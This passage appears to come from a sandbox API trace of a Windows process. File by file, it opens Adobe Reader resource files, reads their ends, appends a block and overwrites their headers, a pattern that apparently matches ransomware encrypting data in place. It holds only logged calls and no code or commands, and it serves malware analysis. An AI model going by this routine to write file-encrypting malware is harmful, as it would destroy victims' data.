(x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro_RO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro_ro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0099.466] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.466] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6ba2 [0099.467] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.467] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.467] ReleaseMutex (hMutex=0x168) returned 1 [0099.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ro_RO.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ro_RO.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ro_RO.txt", lpUsedDefaultChar=0x0) returned 30 [0099.467] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.469] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5ba2 [0099.469] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.473] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5ba2 [0099.473] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.474] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0099.474] WriteFile (in: hFile=0x1e4, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.474] CloseHandle (hObject=0x1e4) returned 1 [0099.474] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0099.474] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.475] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x715c [0099.475] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.475] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.475] ReleaseMutex (hMutex=0x168) returned 1 [0099.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sv.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0099.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sv.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.sv.txt", lpUsedDefaultChar=0x0) returned 27 [0099.475] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.477] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x615c [0099.477] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.482] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x615c [0099.482] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.482] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0099.482] WriteFile (in: hFile=0x1e4, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.483] CloseHandle (hObject=0x1e4) returned 1 [0099.483] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0099.484] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.484] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x605a [0099.484] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.484] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.484] ReleaseMutex (hMutex=0x168) returned 1 [0099.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.zh_TW.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.zh_TW.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.zh_TW.txt", lpUsedDefaultChar=0x0) returned 30 [0099.484] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.486] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x505a [0099.486] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.486] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x505a [0099.487] WriteFile (in: hFile=0x1e4, lpBuffer=0x286ef88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.487] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0099.487] WriteFile (in: hFile=0x1e4, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.487] CloseHandle (hObject=0x1e4) returned 1 [0099.487] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0114.100] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.100] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x8000 [0114.100] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.100] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.100] ReleaseMutex (hMutex=0x168) returned 1 [0114.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brt32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brt32.clx", cchWideChar=9, lpMultiByteStr=0x1f7360c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="brt32.clx", lpUsedDefaultChar=0x0) returned 9 [0114.100] ReadFile (in: hFile=0x1dc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.103] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x7000 [0114.103] ReadFile (in: hFile=0x1dc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.106] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x7000 [0114.106] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.106] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0114.106] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.106] CloseHandle (hObject=0x1dc) returned 1 [0114.107] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0114.108] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.108] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x7ffe [0114.108] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.108] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.108] ReleaseMutex (hMutex=0x168) returned 1 [0114.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bul32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bul32.clx", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bul32.clx", lpUsedDefaultChar=0x0) returned 9 [0114.108] ReadFile (in: hFile=0x1dc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.115] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x6ffe [0114.116] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.117] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x6ffe [0114.117] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.118] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0114.118] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea99e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.118] CloseHandle (hObject=0x1dc) returned 1 [0114.119] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0114.120] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.120] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2000 [0114.120] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.120] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.120] ReleaseMutex (hMutex=0x168) returned 1 [0114.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfr.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfr.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cfr.hyp", lpUsedDefaultChar=0x0) returned 7 [0114.120] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x331f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0114.127] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0114.128] WriteFile (in: hFile=0x1dc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0114.129] CloseHandle (hObject=0x1dc) returned 1 [0114.129] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0114.130] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.130] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2e0 [0114.130] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.130] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.130] ReleaseMutex (hMutex=0x168) returned 1 [0114.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cze.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cze.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cze.fca", lpUsedDefaultChar=0x0) returned 7 [0114.131] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x331f2bc*=0x2e0, lpOverlapped=0x0) returned 1 [0114.139] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0114.139] WriteFile (in: hFile=0x1dc, lpBuffer=0x289e998*, nNumberOfBytesToWrite=0x868, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x289e998*, lpNumberOfBytesWritten=0x331f2d0*=0x868, lpOverlapped=0x0) returned 1 [0114.139] CloseHandle (hObject=0x1dc) returned 1 [0114.139] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\danphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\danphon.env"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0114.140] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.141] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xaf9 [0114.141] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.141] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.141] ReleaseMutex (hMutex=0x168) returned 1 [0114.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="danphon.env", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="danphon.env", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="danphon.env", lpUsedDefaultChar=0x0) returned 11 [0114.141] ReadFile (in: hFile=0x1dc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0xaf9, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f2bc*=0xaf9, lpOverlapped=0x0) returned 1 [0114.189] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0114.189] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea89b8*, nNumberOfBytesToWrite=0x1081, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesWritten=0x331f2d0*=0x1081, lpOverlapped=0x0) returned 1 [0114.190] CloseHandle (hObject=0x1dc) returned 1 [0114.190] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\engphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\engphon.env"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0114.192] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.192] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x9a3 [0114.192] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0114.192] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.192] ReleaseMutex (hMutex=0x168) returned 1 [0114.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="engphon.env", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="engphon.env", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="engphon.env", lpUsedDefaultChar=0x0) returned 11 [0114.192] 